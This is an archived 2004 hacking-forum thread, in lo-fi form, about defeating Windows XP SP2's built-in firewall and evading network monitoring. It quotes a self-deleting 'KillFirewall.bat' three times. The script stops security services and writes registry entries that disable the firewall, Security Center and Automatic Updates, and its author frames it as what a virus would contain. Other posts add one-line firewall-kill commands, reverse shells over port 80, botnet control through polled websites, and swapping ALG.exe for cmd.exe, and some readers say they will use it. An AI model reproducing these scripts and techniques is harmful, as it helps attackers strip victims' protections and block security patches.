You still are talking about the problems of writing drivers for unknown hardware and having them certified. I am not, I am talking about sitting on the upper edge interface of the existing driver and THATS why theres no problem with hardware compatibility, we're using a standard interface. You consistently fail to catch this point, maybe clarity is being lost in the heat of the argument.
That's cause you seemed to change directions on me by first saying MS gave the tools to write our own drivers that can get around firewalls.
Original quote:
QUOTE
microsoft gave us an open architecture to (ab)use as we see fit. The horror of this is that we can take advantage of the published interfaces and write our own shims for the transport/service/namespace, either in the stack (good for some things, not so much for this) or below userland where the NDIS resides along with miniport drivers and the drivers themselves.
I know of no current way to do this that is going to offer any reasonable degree of stealth. After all, if someone is running even a simple IDS, all this work is for nothing. I don't speak for the firewall being any *more* stealthy, cause it isn't, but I do believe the batch file above is something any SP2 virus might include, which is why I stated as such in my original post.
QUOTE
As for internal packet monitoring and assuming that the first machine I meet is the only one I need to compromise, whacking a firewall suffers the same problem. I didn't sell this as a magic bullet, just as a better idea with less administrative noise.
It's the administrative noise part we disagree on then. I really think the same admin that would catch a service policy being disrupted would catch a network policy being disrupted with their IDS.
QUOTE
I didn't mention going to HIP last week. Yes, HIP is not running but I was there in '97 with Skee and a few others. I fail to get your point. I shall dig out some photos of myself at the event and scan them for you.
No need to. My point is that it was 1997. Are you familiar with the "managment" features of current Cisco products? There's not much damage that can even be done with them anymore.
QUOTE
If you look at my first post in this thread I think you will see that I wasn't the one who made all this personal. But now you've got me so mad I'm venting all over the board and thats not good. For THAT and ONLY THAT I apologise.
My issue is not representative of GSO as a whole. It hasn't been the whole time. I was continuing our discussion from the last argument:
QUOTE
Now, Even if I demonstrate my point you're just going to argue that its not necessary and come up with a million problems most of which will also apply to firewall killing. I cannot make any ground with you at all. So, I'll make a few CLEAR tutes on this and a few other little tricks and then I'm leaving the board. People are telling me I shouldn't waste my time with proofs but I feel I have to considering what is being said about me. So, you'll have my paper and then you can misinterpret, malign me and sit 'n' pull holes in every word till you're happy. I certainly won't hang around to answer to any of it, so knock yourself out.
You have knowledge, just share it rather than speaking in whatifs and sensationalizing.
QUOTE
At least then we won't have to suffer each other any longer : /
You don't have to leave the forum just cause we had an argument. Just don't let my view bother you. People here are individuals enough that they are not going to take sides in our argument. In fact, I'm certain they agree with you on some of these issue about moving beyond scripting and getting into kernel-level modifications. I just don't think that the average person is even going to come close to grasping what you're talking about.
Still, using rootkits like HackerDefender is not beyond them, so if they get into some of the nitty gritty and learn to code because of it, it's all good.
Yorn
May 12 2004, 05:56 PM
QUOTE (vnet576 @ May 11 2004, 01:24 PM)
I'm going to interject here to point out an interesting but very simple technique for bypassing common network monitoring activity. Like Yorn mentioned he doesn't monitor port 80 outgoing and neither do most sysops. Thats why you basically make a reverse shell that will try to connect to remote system and give them a command prompt on connection. The outgoing port you would use is 80..the http port.
Ahh.. but some admins *do* go that extra step to make sure that the connection starts with an HTTP GET request. Still, for the most part, what you are describing is EXACTLY what a careful hacker is going to do. I just don't see it important that they do it via a rootkit or via netcat/cryptcat.
vnet576
May 12 2004, 06:08 PM
I'm going to add something along with that. You mentioned botnets, well a similiar principle can be applied to them. Rather than manage them through an irc server..whose port (6667) most sysops block, you can instead manage them through a website. Have the hacked boxes connect and check a particular website every x hours. Note that in this example port 80 and http get is used. On that website you will post specific commands for the bots themselves or for the system in general. For example the website could have entire lists of commands that each system will perform. Simple and virtually fool-proof method for managing large amounts of systems.
Sometimes the simple and low-tech approach is the best one. I have found when programming for windows that programs would just not work or apis would not run for specific versions of OSs. Thats why I tend to use the most low-tech means possible of achieving the desired result.
147111
May 20 2004, 12:29 PM
i think the service name is wrong in the batch file..
i have disabled windows firewall many times using net stop.
the command i always used was:
NET STOP "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"
correct me if i'm wrong
F34R
May 20 2004, 12:45 PM
hmm... good information nontheless even if it is scattered...
blade1310
May 20 2004, 02:46 PM
thanx man, good info here gonna put it to work
toska
May 20 2004, 10:11 PM
very nice!!!
147111
May 21 2004, 02:29 PM
pip, what did that have to do with my post? lol
yeah, i just wouldn't trust it, microsoft isn't exactly known for their security services
Yorn
Jun 16 2004, 04:29 AM
QUOTE (147111 @ May 20 2004, 06:29 AM)
i think the service name is wrong in the batch file..
i have disabled windows firewall many times using net stop.
the command i always used was:
NET STOP "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"
correct me if i'm wrong
You're not entirely wrong, that is for Windows XP and XP SP1, With SP2, you have to use the script that I first posted.
UltraCool
Jun 16 2004, 07:05 AM
Well this loos very interesting, gonna test on my other computer and see if it works.
Thnx alot for sharing this information with us
Uc
ghost_c
Jun 16 2004, 12:17 PM
Xmmm ... Windows 2003 Server
[62.63.64.65] NETBIOS/SMB is not enabled on this computer. Resolving 62.63.64.65... UDP scanning thread started ... Resolved as : thatstheway TCP scanning started ... UDP scanning thread stopped. Operating System : Windows Scan completed in 5 seconds.
Tcp port open : 0 2 Udp ports open : 123 [ NTP => Network Time Protocol ] 445 [ Microsoft CIFS => Common Internet File System ]
Kaspersky Anti-Hacker
(S)
Sep 7 2004, 02:24 AM
QUOTE (Yorn @ Apr 12 2004, 04:57 PM)
Last Update: 5-10-2004 I can assure you the first virus to be released following SP2's inception will contain something similar to the following:
KillFirewall.bat
CODE
@echo off net stop "Security Center" net stop SharedAccess > "%Temp%.\kill.reg" ECHO REGEDIT4 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.\kill.reg" DEL "%Temp%.\kill.reg" DEL %0
Shuts down Windows Firewall, disables Automatic Updates for the next reboot.
And no, Microsoft is not going to fix this. This code will work when it goes live. WTG MS!
4-24-2004 EDIT: Added "DEL %0" at the request of illwill to delete the batch file itself.
5-7-2004 EDIT: Changed to "net stop SharedAccess" as indicated by int23h
5-10-2004 EDIT: Okay. Microsoft added another service after my first post and I didn't even notice it. Looks like it is time to disable that too. Modified the code to reflect that.
Last Update: 5-10-2004 I can assure you the first virus to be released following SP2's inception will contain something similar to the following:
KillFirewall.bat
CODE
@echo off net stop "Security Center" net stop SharedAccess > "%Temp%.\kill.reg" ECHO REGEDIT4 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.\kill.reg" DEL "%Temp%.\kill.reg" DEL %0
Shuts down Windows Firewall, disables Automatic Updates for the next reboot.
And no, Microsoft is not going to fix this. This code will work when it goes live. WTG MS!
4-24-2004 EDIT: Added "DEL %0" at the request of illwill to delete the batch file itself.
5-7-2004 EDIT: Changed to "net stop SharedAccess" as indicated by int23h
5-10-2004 EDIT: Okay. Microsoft added another service after my first post and I didn't even notice it. Looks like it is time to disable that too. Modified the code to reflect that.
everyone here is there to learn and to help....if you can't help without insulting, don't answer....
Its not like if the mistake was so easy to find and nor was it asked several times in the past
(S)
Sep 7 2004, 03:53 AM
QUOTE (mortello @ Sep 6 2004, 10:17 PM)
No need to tell him he is a newbie....
everyone here is there to learn and to help....if you can't help without insulting, don't answer....
Its not like if the mistake was so easy to find and nor was it asked several times in the past
I want know, it's wrong??? You are never a newbie???
Serhat
Sep 7 2004, 05:10 AM
%temp% is de temp directory yes.. try it... cd %temp% .. and see where you get.. this is incase the temp directory is in another dir ... so you can still install all the stuff (in this case echo the regkeys and run them)... or just type 'set' in the command prompt to see more 'variables' like this one
And no, no newbie... like mortelle said he is here to help.. that you don't understand the stuff he writes down could happen.. but that doesn't makes him a newbie Then again seems he pasted the end of the stuff @ the start of the line
Serhat
(S)
Sep 7 2004, 05:46 AM
QUOTE (Serhat @ Sep 7 2004, 12:10 AM)
%temp% is de temp directory yes.. try it... cd %temp% .. and see where you get.. this is incase the temp directory is in another dir ... so you can still install all the stuff (in this case echo the regkeys and run them)... or just type 'set' in the command prompt to see more 'variables' like this one
And no, no newbie... like mortelle said he is here to help.. that you don't understand the stuff he writes down could happen.. but that doesn't makes him a newbie Then again seems he pasted the end of the stuff @ the start of the line
Serhat
Sorry mortello Thanks to Serhat
dagg3r
Sep 18 2004, 11:16 AM
May i ask something i might be wrong but i want to clarify something.
I have Windows XP SP1 and from what i did, i used pskill or one of those process killers to kill the ALG.exe, then i copied CMD.exe to ALG.exe in system32 and changed the attribites to +RASH. and upon restarting the windows firewall doesnt work, as in you can enable/disable but doesnt seem to work. does ALG.exe control the windows xp firewall? and would this work on windows xp sp 2?
strasharo
Sep 19 2004, 10:19 AM
QUOTE (Yorn @ Apr 12 2004, 09:57 PM)
Last Update: 5-10-2004 I can assure you the first virus to be released following SP2's inception will contain something similar to the following:
KillFirewall.bat
CODE
@echo off net stop "Security Center" net stop SharedAccess > "%Temp%.\kill.reg" ECHO REGEDIT4 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. >>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc] >>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.\kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.\kill.reg" DEL "%Temp%.\kill.reg" DEL %0
Shuts down Windows Firewall, disables Automatic Updates for the next reboot.
And no, Microsoft is not going to fix this. This code will work when it goes live. WTG MS!
4-24-2004 EDIT: Added "DEL %0" at the request of illwill to delete the batch file itself.
5-7-2004 EDIT: Changed to "net stop SharedAccess" as indicated by int23h
5-10-2004 EDIT: Okay. Microsoft added another service after my first post and I didn't even notice it. Looks like it is time to disable that too. Modified the code to reflect that.
Well Yorn,but isn`t it much easier to do something like this?
Isn`t this a lot easier instead of writing a bunch of reg stuff,it does exactly the same work? Erm, in win2k sc.exe isn`t included by default but in XP it is,so your batch may be handy with win2k but we are talking about XP.
Have a nice day!
Yorn
Sep 23 2004, 06:50 PM
Guys, I encourage you to check out the date on this. This was written about 6 months before SP2 even came out. they have since added a lot more functionality making Security Center even easier to shut down.
Train25
Sep 24 2004, 01:20 AM
Didn't really read the posts through but i know this command will disable the firewall completly
netsh firewall opmode disable
strasharo
Sep 25 2004, 02:09 AM
QUOTE (Train25 @ Sep 24 2004, 01:20 AM)
Didn't really read the posts through but i know this command will disable the firewall completly
netsh firewall opmode disable
Just a little correction,you have missed one "set" the proper command is
netsh firewall set opmode disable
Thats it!
Have a nice day!
Train25
Sep 25 2004, 05:16 AM
QUOTE (strasharo @ Sep 24 2004, 10:09 PM)
Just a little correction,you have missed one "set" the proper command is
netsh firewall set opmode disable
Thats it!
Have a nice day!
you are absolutely correct.
losted
Oct 2 2004, 09:40 PM
thx for the share
I will try it
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
